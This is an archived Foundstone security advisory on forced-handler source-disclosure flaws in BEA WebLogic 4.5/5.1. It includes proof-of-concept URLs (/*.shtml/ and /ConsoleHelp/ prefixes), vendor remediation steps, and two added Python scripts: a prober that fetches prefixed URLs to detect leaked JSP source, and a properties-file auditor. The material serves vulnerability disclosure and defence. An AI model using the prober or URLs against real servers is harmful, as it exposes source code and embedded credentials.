FS-072800-9-BEA.txt

2000-07-30T00:00:00
ID PACKETSTORM:22679
Type packetstorm
Reporter Saumil Shah
Modified 2000-07-30T00:00:00

Description

                                        
Foundstone, Inc.  
http://www.foundstone.com  
"Securing the Dot Com World"  
  
Security Advisory  
  
BEA's WebLogic force handlers show code vulnerability  
  
----------------------------------------------------------------------  
FS Advisory ID: FS-072800-9-BEA  
  
Release Date: July 28, 2000  
  
Product: WebLogic  
  
Vendor: BEA Systems (http://www.beasys.com)  
  
Vendor Advisory: Contact the vendor  
  
Type: Forced Handlers: Show code vulnerability  
  
Severity: Low to Medium (depending on JSP/JHTML coding  
practices & web application security)  
  
Author: Saumil Shah (saumil.shah@foundstone.com)  
Shreeraj Shah (shreeraj.shah@foundstone.com)  
  
Operating Systems: All operating systems  
  
Vulnerable versions: BEA WebLogic Enterprise 5.1.x  
BEA WebLogic Server and Express 5.1.x  
BEA WebLogic Server and Express 4.5.x  
  
Foundstone Advisory: http://www.foundstone.com  
----------------------------------------------------------------------  
  
Description  
  
Two "show code" vulnerabilities exist in BEA WebLogic 5.1.0 that  
allow an attacker to view the source code of any file within the  
web document root of the web server. Depending on the web  
application and its directory structure, an attacker can thereby  
access and view files that were never meant to be served unparsed  
(JSP/JHTML source, and whatever credentials or logic it embeds).  
  
Details  
  
1. Viewing unparsed pages by forcibly invoking SSIServlet:  
----------------------------------------------------------  
  
Server Side Includes pages are processed by the SSIServlet in  
WebLogic.  
  
It is registered in the weblogic.properties file as follows:  
  
weblogic.httpd.register.*.shtml=weblogic.servlet.ServerSideIncludeServlet  
  
It turns out that the wild card (*) registration can itself be  
used as a handler to invoke the SSIServlet via a URL.  
  
Thus, if the file path in the URL is prefixed with /*.shtml/,  
one can force that file to be processed by SSIServlet instead of  
the handler registered for its own extension. Used against other  
file types such as .jsp and .jhtml, this returns the unparsed JSP  
and JHTML source rather than the compiled page's output.  
  
2. Viewing unparsed pages by forcibly invoking FileServlet:  
-----------------------------------------------------------  
  
WebLogic comes pre-configured with the ConsoleHelp servlet  
being registered to invoke FileServlet, as can be seen from  
the following lines in the weblogic.properties file:  
  
# For Console help. Do not modify.  
weblogic.httpd.register.ConsoleHelp=weblogic.servlet.FileServlet  
weblogic.httpd.initArgs.ConsoleHelp=\  
defaultFilename=/weblogic/admin/help/NoContent.html  
weblogic.allow.execute.weblogic.servlet.ConsoleHelp=everyone  
  
Thus, if the file path in the URL is prefixed with  
/ConsoleHelp/, it causes WebLogic to invoke FileServlet, which  
causes pages to be displayed without being parsed or compiled.  
  
Proof of concept  
  
1. Using *.shtml:  
  
Prefixing the path to web pages with "/*.shtml/" in the URL  
causes the file to be displayed since it is processed by  
SSIServlet. For example if the URL for a file "login.jsp" is:  
  
http://site.running.weblogic/login.jsp  
  
then accessing  
  
http://site.running.weblogic/*.shtml/login.jsp  
  
would be served by SSIServlet, and the unparsed JSP/JHTML source  
can be seen in the web browser.  
  
2. Using ConsoleHelp:  
  
Prefixing the path to web pages with "/ConsoleHelp/" in the  
URL causes the file to be displayed without being parsed or  
compiled. For example if the URL for a file "login.jsp" is:  
  
http://site.running.weblogic/login.jsp  
  
then accessing  
  
http://site.running.weblogic/ConsoleHelp/login.jsp  
  
would cause the unparsed contents of the file to show up in  
the web browser.  
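The two proof-of-concept requests above, as an added example that is not part of the Foundstone advisory or BEA's code: a small Python checker that builds both handler-prefixed URLs for a page, fetches them, and decides whether raw source came back by comparing against the normally served page. The two prefixes are the advisory's; the byte markers used to recognise unparsed JSP/JHTML (`<%`, `<jsp:`, `<java>`), the User-Agent string, and the two constructed sample bodies are assumptions made for this example.

```python
"""Check a WebLogic host for the two forced-handler "show code" paths
(added example, not Foundstone's or BEA's code).  Only the two URL
prefixes come from the advisory; the byte markers used to recognise
unparsed JSP/JHTML and the User-Agent string are assumptions."""
import sys
import urllib.error
import urllib.request

# Handler prefixes quoted in the advisory.
HANDLER_PREFIXES = ("/*.shtml/", "/ConsoleHelp/")

# Assumed markers.  An executed page never emits these; a page that
# SSIServlet or FileServlet served verbatim still contains them.
SOURCE_MARKERS = (b"<%", b"<jsp:", b"<java>", b"</java>")

# Constructed sample bodies for offline use: what login.jsp might return
# when compiled normally, and what the same file looks like served raw.
RENDERED_SAMPLE = b"<html><form action=\"login.jsp\"><input name=\"user\"></form></html>"
RAW_SAMPLE = (b"<%@ page import=\"java.sql.*\" %>\n"
              b"<% String dsn = \"jdbc:weblogic:pool:appdb\"; %>\n"
              b"<html><form action=\"login.jsp\"><input name=\"user\"></form></html>")


def normalise_path(path):
    """Ensure the page path is absolute ("/login.jsp")."""
    return path if path.startswith("/") else "/" + path


def build_probe_urls(base, path):
    """Return [(prefix, url), ...] for one page, e.g.
    ("http://site.running.weblogic", "/login.jsp")."""
    path = normalise_path(path)
    base = base.rstrip("/")
    return [(p, base + p.rstrip("/") + path) for p in HANDLER_PREFIXES]


def looks_like_source(body):
    """True if the body still carries JSP/JHTML markup."""
    return any(m in body for m in SOURCE_MARKERS)


def classify(normal_body, handler_body):
    """Compare the normal response with the handler-prefixed one.

    'vulnerable'        raw markup came back only via the handler prefix
    'not-a-parsed-page' the normal URL already returns markup, so the file
                        is not compiled anyway (no leak attributable to it)
    'not-vulnerable'    neither response carries source
    """
    if looks_like_source(handler_body):
        return "not-a-parsed-page" if looks_like_source(normal_body) else "vulnerable"
    return "not-vulnerable"


def fetch(url, timeout=10):
    """GET url, returning (status, body); HTTP errors are returned, not raised."""
    req = urllib.request.Request(url, headers={"User-Agent": "showcode-check"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as err:
        return err.code, err.read()


def probe(base, path):
    """Live check: returns {prefix: verdict} for the page at base+path."""
    path = normalise_path(path)
    _, normal = fetch(base.rstrip("/") + path)
    verdicts = {}
    for prefix, url in build_probe_urls(base, path):
        status, body = fetch(url)
        verdicts[prefix] = classify(normal, body) if status == 200 else f"http-{status}"
    return verdicts


if __name__ == "__main__":
    if len(sys.argv) == 3:        # python showcode.py http://site.running.weblogic /login.jsp
        for prefix, verdict in probe(sys.argv[1], sys.argv[2]).items():
            print(f"{prefix:<14} {verdict}")
    else:                         # offline demo on the constructed bodies
        print("constructed sample:", classify(RENDERED_SAMPLE, RAW_SAMPLE))
```

The comparison with the normally served page matters: a file that is not a parsed page at all (a plain .html that happens to contain `<%`, or a page the server was never going to compile) returns markup either way, and reporting that as a handler leak would be a false positive.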
  
Solution  
  
Please refer to BEA security advisory BEA00-03.00.  
  
From the vendor (as appears in BEA00-03.00):  
  
(1) Apply the "Show Code" vulnerability patch available from  
BEA Technical Support. This patch is available for:  
  
Version: The J-Engine in BEA WebLogic Enterprise 5.1.x  
BEA WebLogic Server and Express 5.1.x  
BEA WebLogic Server and Express 4.5.x  
  
Action: Contact BEA Technical Support at support@bea.com for  
patch.  
  
(2) Once the patch has been applied, review the  
weblogic.properties file and ensure that the following changes  
have been made:  
  
weblogic.httpd.register.file=weblogic.servlet.FileServlet  
weblogic.httpd.initArgs.file=defaultFilename=index.html  
weblogic.httpd.defaultServlet=file  
  
should be changed to:  
  
weblogic.httpd.register.*.html=weblogic.servlet.FileServlet  
weblogic.httpd.initArgs.*.html=defaultFilename=index.html  
weblogic.httpd.defaultServlet=*.html  
  
Future Service Packs for BEA WebLogic Server and Express will  
also contain the patch to address this vulnerability.  
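The weblogic.properties changes above, as an added example that is not BEA's or Foundstone's tooling: a small Python audit that parses the properties file (including the trailing-backslash continuation used by the ConsoleHelp initArgs line) and reports the pre-patch register.file / defaultServlet=file layout that BEA00-03.00 says to rename. It also lists every handler registered to FileServlet or ServerSideIncludeServlet for review; that generalisation beyond the advisory's two quoted cases, and the constructed sample file contents, are this example's assumptions.

```python
"""Audit a weblogic.properties file for the registrations this advisory
turns on (added example; not BEA's tooling).  The property names and
servlet class names are the ones quoted in the advisory; treating every
handler registered to FileServlet or ServerSideIncludeServlet as worth
review generalises its two cases and is this example's assumption."""
import sys

FILE_SERVLET = "weblogic.servlet.FileServlet"
SSI_SERVLET = "weblogic.servlet.ServerSideIncludeServlet"
REGISTER = "weblogic.httpd.register."

# Constructed sample: the ConsoleHelp and *.shtml lines as quoted in the
# advisory plus the pre-patch default-servlet lines from BEA00-03.00.
PRE_PATCH = """\
# For Console help. Do not modify.
weblogic.httpd.register.ConsoleHelp=weblogic.servlet.FileServlet
weblogic.httpd.initArgs.ConsoleHelp=\\
    defaultFilename=/weblogic/admin/help/NoContent.html
weblogic.allow.execute.weblogic.servlet.ConsoleHelp=everyone
weblogic.httpd.register.*.shtml=weblogic.servlet.ServerSideIncludeServlet
weblogic.httpd.register.file=weblogic.servlet.FileServlet
weblogic.httpd.initArgs.file=defaultFilename=index.html
weblogic.httpd.defaultServlet=file
"""

# The same file after the property changes BEA00-03.00 asks for.
POST_PATCH = PRE_PATCH.replace(
    "register.file=", "register.*.html=").replace(
    "initArgs.file=", "initArgs.*.html=").replace(
    "defaultServlet=file", "defaultServlet=*.html")


def parse_properties(text):
    """Minimal java.util.Properties reader: '#'/'!' comment lines,
    key=value pairs, and trailing-backslash line continuation."""
    props, pending = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if pending is not None:          # continuation of the previous line
            line, pending = pending + line, None
        elif not line or line[0] in "#!":
            continue
        if line.endswith("\\"):
            pending = line[:-1]
            continue
        key, sep, value = line.partition("=")
        if sep:
            props[key.strip()] = value.strip()
    return props


def audit(props):
    """Return a list of findings (empty means nothing to act on)."""
    findings = []
    if (props.get("weblogic.httpd.defaultServlet") == "file"
            and props.get("weblogic.httpd.register.file") == FILE_SERVLET):
        findings.append("pre-patch layout: register.file / defaultServlet=file "
                        "(BEA00-03.00 says to rename these to *.html)")
    for key, value in props.items():
        if key.startswith(REGISTER) and value in (FILE_SERVLET, SSI_SERVLET):
            findings.append(f"review handler {key[len(REGISTER):]!r} -> {value}")
    return findings


if __name__ == "__main__":
    # python wlaudit.py /path/to/weblogic.properties  (or no argument for the sample)
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else PRE_PATCH
    for finding in audit(parse_properties(text)) or ["no findings"]:
        print(finding)
```

The properties change alone is not the fix; the advisory is explicit that the vendor patch must be applied first, and the handler list this script prints (ConsoleHelp, *.shtml, and after the change *.html) is there so the operator can confirm what is still reachable once it is.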
  
Credits  
  
We would like to thank BEA Systems for their prompt and  
serious reaction to this problem.  
  
Disclaimer  
  
THE INFORMATION CONTAINED IN THIS ADVISORY IS THE COPYRIGHT  
(C) 2000 OF FOUNDSTONE, INC. AND BELIEVED TO BE ACCURATE AT  
THE TIME OF PRINTING, BUT NO REPRESENTATION OR WARRANTY IS  
GIVEN, EXPRESS OR IMPLIED, AS TO ITS ACCURACY OR COMPLETENESS.  
NEITHER THE AUTHOR NOR THE PUBLISHER ACCEPTS ANY LIABILITY  
WHATSOEVER FOR ANY DIRECT, INDIRECT OR CONSEQUENTIAL LOSS OR  
DAMAGE ARISING IN ANY WAY FROM ANY USE OF, OR RELIANCE PLACED  
ON, THIS INFORMATION FOR ANY PURPOSE. THIS ADVISORY MAY BE  
REDISTRIBUTED PROVIDED THAT NO FEE IS ASSIGNED AND THAT THE  
ADVISORY IS NOT MODIFIED IN ANY WAY.  
  